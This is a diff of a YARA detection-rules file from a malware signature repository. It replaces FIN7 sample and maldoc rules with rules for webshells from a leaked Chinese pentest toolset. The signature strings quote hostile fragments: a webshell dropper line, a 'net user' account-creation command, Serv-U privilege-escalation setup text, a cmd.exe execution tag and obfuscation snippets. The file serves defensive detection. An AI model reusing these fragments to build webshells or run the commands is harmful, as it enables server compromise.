-		$x4 = "002e006c006e006b002d00000043003a005c00550073006500720073005c007400650073007400610064006d0069006e002e0054004500530054005c0044" ascii
-		$x5 = "005c00550073006500720073005c005400450053005400410044007e0031002e005400450053005c0041007000700044006100740061005c004c006f0063" ascii
-		$x6 = "6c00690063006100740069006f006e002200220029003a00650078006500630075007400650020007700700072006f0074006500630074002e0041006300" ascii
-		$x7 = "7374656d33325c6d736874612e657865000023002e002e005c002e002e005c002e002e005c00570069006e0064006f00770073005c005300790073007400" ascii
-		$x8 = "\\par \\tab \\tab sh.Run \"%comspec% /c tasklist >\"\"\" & tpath & \"\"\" 2>&1\", 0, true" fullword ascii
-		$x9 = "00720079007b006500760061006c0028002700770061006c006c003d004700650074004f0062006a0065006300740028005c005c0027005c005c00270027" ascii
-		$x10 = "006e00640079005c004400650073006b0074006f0070005c0075006e006c006f0063006b002e0064006f0063002e006c006e006b" ascii
+		$s1 = "<form action=\"?action=operator&cmd=execute\"" fullword ascii
+		$s2 = "String sql = request.getParameter(\"sqlcmd\");" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5c7b and filesize < 3000KB and ( 1 of ( $x* ) or 2 of them )
+		filesize < 35KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Injection_Transit_Jmpost : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Webshell from CN Honker Pentest Toolset - file jmPost.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "46c82d27-5683-5acd-9a3c-d69613091ecc"
-		date = "2018-08-01"
+		id = "892f747e-6065-5baf-b928-8d69d8792483"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L95-L108"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L371-L386"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7144d4c7651e3fb288ef608fdff07af6cb223c90c34fb780d65184760386d5c7"
-		score = 75
+		hash = "f80ec26bbdc803786925e8e0450ad7146b2478ff"
+		logic_hash = "6c7f52cf7ff6df9867ea2c46cd8f40ef0e077d4e1d9033cde0649a209bffe21b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7f16cbe7aa1fbc5b8a95f9d123f45b7e3da144cb88db6e1da3eca38cf88660cb"
 
 	strings:
-		$s1 = "Manche Enterprises Limited0" fullword ascii
+		$s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii
+		$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them
+		filesize < 9KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Web_Asp : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Webshell from CN Honker Pentest Toolset - file web.asp.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4522cd85-ba85-5afd-8600-1ebabfaf6d02"
-		date = "2018-08-01"
+		id = "67e03591-770a-5b32-9579-c899894740fc"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L110-L124"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L388-L403"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8e62c9488f211635ae30633a0d894b00e0ba2a7e7d4cb628117a166d4f0f9697"
-		score = 75
+		hash = "aebf6530e89af2ad332062c6aae4a8ca91517c76"
+		logic_hash = "5d2d7e6b9340ee4fd845ff05c99526c919214974b1a0def66492fe3cd4a75fe9"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "60cd98fc4cb2ae474e9eab81cd34fd3c3f638ad77e4f5d5c82ca46f3471c3020"
 
 	strings:
-		$s1 = "constructor or from DllMain." fullword ascii
-		$s2 = "Network Software Ltd0" fullword ascii
+		$s0 = "<FORM method=post target=_blank>ShellUrl: <INPUT " fullword ascii
+		$s1 = "\" >[Copy code]</a> 4ngr7&nbsp; &nbsp;</td>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		filesize < 13KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_3 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Wshell_Asp : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Webshell from CN Honker Pentest Toolset - file wshell-asp.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0b0ce882-1c18-5741-bb71-0cef010dc778"
-		date = "2018-08-01"
+		id = "294f0d00-7102-553d-92e2-c0a0e017385c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L126-L140"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L405-L421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3f757bc4a6d46be85732fe33dd0a323c5774cbc1f0da2b984c5db14c1362745a"
-		score = 75
+		hash = "4a0afdf5a45a759c14e99eb5315964368ca53e9c"
+		logic_hash = "f3c4af85e4798d3a809d8edd9cc46d1df44453f14ed050b002fe789da4d6096f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "995b90281774798a376db67f906a126257d314efc21b03768941f2f819cf61a6"
 
 	strings:
-		$s1 = "cvzdfhtjkdhbfszngjdng" fullword ascii
-		$s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
+		$s1 = "file1.Write(\"<%response.clear:execute request(\\\"root\\\"):response.End%>\");" fullword ascii
+		$s2 = "hello word !  " fullword ascii
+		$s3 = "root.asp " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them
+		filesize < 5KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_4 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp404 : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Webshell from CN Honker Pentest Toolset - file asp404.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bead79bb-28c2-59ed-985b-e44b41e7f66a"
-		date = "2018-08-01"
+		id = "4125bb40-3f5c-53f5-b906-54fa77b119f5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L142-L157"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L423-L439"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cd8a33c4e4f626d744e03f48e093f6a45223c74088b03185833ece8034614ca4"
-		score = 75
+		hash = "bed51971288aeabba6dabbfb80d2843ec0c4ebf6"
+		logic_hash = "c84be2e561a08317be11cdb0fe103f8ad182a64d8cd1bf987163ebbeabe20f00"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4b5405fc253ed3a89c770096a13d90648eac10a7fb12980e587f73483a07aa4c"
 
 	strings:
-		$s1 = "c:\\file.dat" fullword wide
-		$s2 = "constructor or from DllMain." fullword ascii
-		$s3 = "lineGetCallIDs" fullword ascii
+		$s0 = "temp1 = Len(folderspec) - Len(server.MapPath(\"./\")) -1" fullword ascii
+		$s1 = "<form name=\"form1\" method=\"post\" action=\"<%= url%>?action=chklogin\">" fullword ascii
+		$s2 = "<td>&nbsp;<a href=\"<%=tempurl+f1.name%>\" target=\"_blank\"><%=f1.name%></a></t" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
+		filesize < 113KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_5 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Asp : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Webshell from CN Honker Pentest Toolset - file Serv-U asp.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c810662-9ceb-5c3b-8f83-5a4aa2a5d461"
-		date = "2018-08-01"
+		id = "06a58a05-92bd-5124-a172-2bfd9491c2fc"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L159-L173"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L441-L457"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "893e144d86025db750b32ae69964578ec92862face706339a5bafb393e3c7091"
-		score = 75
+		hash = "cee91cd462a459d31a95ac08fe80c70d2f9c1611"
+		logic_hash = "c98c3f4db5ea812827b6108ef88b57116621142202248f4f26f0c71bd76e33ec"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
 
 	strings:
-		$s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
-		$s3 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
+		$s1 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii
+		$s2 = "<td><input name=\"c\" type=\"text\" id=\"c\" value=\"cmd /c net user goldsun lov" ascii
+		$s3 = "deldomain = \"-DELETEDOMAIN\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \" PortNo=\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		filesize < 30KB and 2 of them
 }
-
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_6 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Cfm_List : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Webshell from CN Honker Pentest Toolset - file list.cfm"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2b2e6b74-5d71-5656-8faf-37c94607d93e"
-		date = "2018-08-01"
+		id = "98302eef-d1e8-5524-a57e-d49c0e92c7e0"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L175-L198"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L459-L474"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "33db8e61b6220d9e16191228573d3d375cce9528241dcf1ad74d641f0959f03b"
-		score = 75
+		hash = "85d445b13d2aef1df3b264c9b66d73f0ff345cec"
+		logic_hash = "41c7c5ba6187a8871dec83bcd859b9377813d60cea8ef2b4ad390c67de04e010"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1439d301d931c8c4b00717b9057b23f0eb50049916a48773b17397135194424a"
 
 	strings:
-		$s1 = "coreServiceShell.exe" fullword ascii
-		$s2 = "PtSessionAgent.exe" fullword ascii
-		$s3 = "TiniMetI.exe" fullword ascii
-		$s4 = "PwmSvc.exe" fullword ascii
-		$s5 = "uiSeAgnt.exe" fullword ascii
-		$s7 = "LHOST:" fullword ascii
-		$s8 = "TRANSPORT:" fullword ascii
-		$s9 = "LPORT:" fullword ascii
+		$s1 = "<TD><a href=\"javascript:ShowFile('#mydirectory.name#')\">#mydirectory.name#</a>" ascii
+		$s2 = "<TD>#mydirectory.size#</TD>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.exports ( "TiniStart" ) or 4 of them )
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_7 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php2 : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Webshell from CN Honker Pentest Toolset - file php2.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "96943654-a6e8-59c0-ab6c-1ab3906a5d05"
-		date = "2018-08-01"
+		id = "377ff89d-a9ba-526c-97a1-388f9ccb48ba"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L200-L214"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L476-L491"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "212bc13d22d7bc6b0ef10ae034ea09c7ea0d0e66afd212fb55c09cf43344c2ec"
-		score = 75
+		hash = "bf12e1d741075cd1bd324a143ec26c732a241dea"
+		logic_hash = "707e2795d82636fbbc4d9f5324e509a526f77f9ead8f3c4d59dd0e95bc94f11e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ce8ce35f85406cd7241c6cc402431445fa1b5a55c548cca2ea30eeb4a423b6f0"
 
 	strings:
-		$s1 = "libpng version" fullword ascii
-		$s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
+		$s1 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
+		$s2 = "<?php // Black" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		filesize < 12KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_8 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Oracle : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Webshell from CN Honker Pentest Toolset - file oracle.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1eb9810e-2b50-5a93-925e-073bb17e1e6c"
-		date = "2018-08-01"
+		id = "adc8dea6-8031-580b-b19a-e5520d41528f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L216-L229"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L493-L509"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f15a8dfd3efb094ab73caebe9bffb5735762960445ca421cd49eaa091ecea300"
-		score = 75
+		hash = "fc7043aaac0ee2d860d11f18ddfffbede9d07957"
+		logic_hash = "3ad4207e426ed2f9df0e0bac0e906af437b0774ba2ebb541afbe7e29b395ad63"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d8bda53d7f2f1e4e442a0e1c30a20d6b0ac9c6880947f5dd36f78e4378b20c5c"
 
 	strings:
-		$s1 = "GetL3st3rr" fullword ascii
+		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword ascii
+		$s2 = "String user=\"oracle_admin\";" fullword ascii
+		$s3 = "String sql=\"SELECT 1,2,3,4,5,6,7,8,9,10 from user_info\";" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		filesize < 7KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_10 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx4 : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Webshell from CN Honker Pentest Toolset - file aspx4.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2c6f557e-31d3-5377-a3fa-4f1507f28386"
-		date = "2018-08-01"
+		id = "4a13c809-48f7-54f7-9ce3-10d6d48104fb"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L231-L248"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L511-L527"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1d6dba0c858eacea5bd67682a588105a2ff09d10bb60d9888ace07609c9b33de"
-		score = 75
+		hash = "200a8f15ffb6e3af31d28c55588003b5025497eb"
+		logic_hash = "0aab8e327b4477cb0b8cd5d4b1e4b52c160180656dad57b0498654da1c8d7a29"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8cc02b721683f8b880c8d086ed055006dcf6155a6cd19435f74dd9296b74f5fc"
 
 	strings:
-		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
-               00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43
-               00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74
-               00 20 00 31 00 20 00 2D 00 20 00 31 00 39 00 }
+		$s4 = "File.Delete(cdir.FullName + \"\\\\test\");" fullword ascii
+		$s5 = "start<asp:TextBox ID=\"Fport_TextBox\" runat=\"server\" Text=\"c:\\\" Width=\"60" ascii
+		$s6 = "<div>Code By <a href =\"http://www.hkmjj.com\">Www.hkmjj.Com</a></div>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+		filesize < 11KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_Sample_EXE_Aug18_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx : FILE
 {
 	meta:
-		description = "Detects FIN7 Sample"
+		description = "Webshell from CN Honker Pentest Toolset - file aspx.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c66a234-9dee-5279-b855-892b12d036ff"
-		date = "2018-08-01"
+		id = "4a13c809-48f7-54f7-9ce3-10d6d48104fb"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L250-L275"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L529-L546"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "780e2cb9a704e0df0383737928c2cfc8aa5de5a8f3c9dc67de866d5ac73b8402"
-		score = 75
+		hash = "8378619b2a7d446477946eabaa1e6744dec651c1"
+		logic_hash = "b59684633fd72bd1804a96850a8b358db98c169415b6e65fe3ecfb4d9fde72d0"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "608003c2165b0954f396d835882479f2504648892d0393f567e4a4aa90659bf9"
-		hash2 = "deb62514704852ccd9171d40877c59031f268db917c23d00a2f0113dab79aa3b"
-		hash3 = "16de81428a034c7b2636c4a875809ab62c9eefcd326b50c3e629df3b141cc32b"
-		hash4 = "3937abdd1fd63587022ed540a31c58c87c2080cdec51dd24af3201a6310059d4"
-		hash5 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
 
 	strings:
-		$s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
-		$s2 = "dx=%d, dy=%d" fullword ascii
-		$s3 = "Error with JP2H box size" fullword ascii
-		$co1 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-               00 00 00 00 00 00 00 00 00 00 00 2E 63 6F 64 65
-               00 00 00 }
+		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
+		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+		$s2 = "td.Text=\"<a href=\\\"javascript:Bin_PostBack('urJG','\"+dt.Rows[j][\"ProcessID" ascii
+		$s3 = "vyX.Text+=\"<a href=\\\"javascript:Bin_PostBack('Bin_Regread','\"+MVVJ(rootkey)+" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $s* ) and $co1 at 0x015D
+		filesize < 353KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_FIN7_Msdoc_Sep21_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Su7_X_9_X : FILE
 {
 	meta:
-		description = "Detects MalDocs used by FIN7 group"
+		description = "Webshell from CN Honker Pentest Toolset - file su7.x-9.x.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fbde087-ec1e-5614-af1e-f342b1766fa2"
-		date = "2021-09-07"
+		id = "5d546ce8-6f8f-5b0b-9472-23f283ef9f80"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L277-L301"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L548-L563"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ffc91cdad91b8ab24840c6ef1a6c39aad081d986c21a88b3f2ea3ec1bcd3b52b"
-		score = 85
+		hash = "808396b51023cc8356f8049cfe279b349ca08f1a"
+		logic_hash = "2d2398cf0f9e253eea343d39b6555f2633f92f627f1c93cc28123d5a7f3d1bf1"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "d60b6a8310373c9b84e6760c24185535"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 00 4A 00 6F 00 68 00 6E 00 0B 00 57 00 31 00 30
-               00 50 00 72 00 6F 00 4F 00 66 00 66 00 31 00 36 }
-		$s1 = "word_data.bin" ascii fullword
-		$s2 = "V:\\DOC\\For_JS" ascii
-		$s3 = "HomeCompany" ascii
-		$s4 = "W10ProOff16" ascii
+		$s0 = "returns=httpopen(\"LoginID=\"&user&\"&FullName=&Password=\"&pass&\"&ComboPasswor" ascii
+		$s1 = "returns=httpopen(\"\",\"POST\",\"http://127.0.0.1:\"&port&\"/Admin/XML/User.xml?" ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and ( 1 of ( $x* ) or 3 of them )
+		filesize < 59KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_OBFUSC_JS_Sept21_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Cfmshell : FILE
 {
 	meta:
-		description = "Detects JavaScript obfuscation as used in MalDocs by FIN7 group"
+		description = "Webshell from CN Honker Pentest Toolset - file cfmShell.cfm"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5ab9cd60-077c-5066-bd2f-8da261aae1e0"
-		date = "2021-09-07"
+		id = "40d50ddb-2963-5d8e-b93a-bb44a8944229"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L303-L323"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L565-L580"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "235ff8fe5c033fd90d77ecf9ce80b59be7bf6ae5a2863a1c9365d8b125a7ff3f"
-		score = 65
+		hash = "740796909b5d011128b6c54954788d14faea9117"
+		logic_hash = "0767012ec8fd4a18a64eca04d459efb55fafd29ed052dab8a0eb1b8f4ce7aa66"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "=new RegExp(String.fromCharCode(" ascii
-		$s2 = ".charCodeAt(" ascii
-		$s3 = ".substr(0, " ascii
-		$s4 = "var shell = new ActiveXObject(" ascii
-		$s5 = "= new Date().getUTCMilliseconds();" ascii
-		$s6 = ".deleteFile(WScript.ScriptFullName);" ascii
+		$s0 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii
+		$s4 = "<cfif FileExists(\"#GetTempDirectory()#foobar.txt\") is \"Yes\">" fullword ascii
 
 	condition:
-		filesize < 6000KB and ( 4 of them )
+		filesize < 4KB and all of them
 }
-rule SIGNATURE_BASE_Wmimplant
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp4 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file WMImplant.ps1"
+		description = "Webshell from CN Honker Pentest Toolset - file asp4.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "18dadc55-e12f-5c4c-9e11-27dc2d6c8dd2"
-		date = "2017-03-24"
+		id = "4125bb40-3f5c-53f5-b906-54fa77b119f5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_wmi_implant.yar#L10-L28"
+		reference = "Disclosed CN Honker Pentest Toolset"
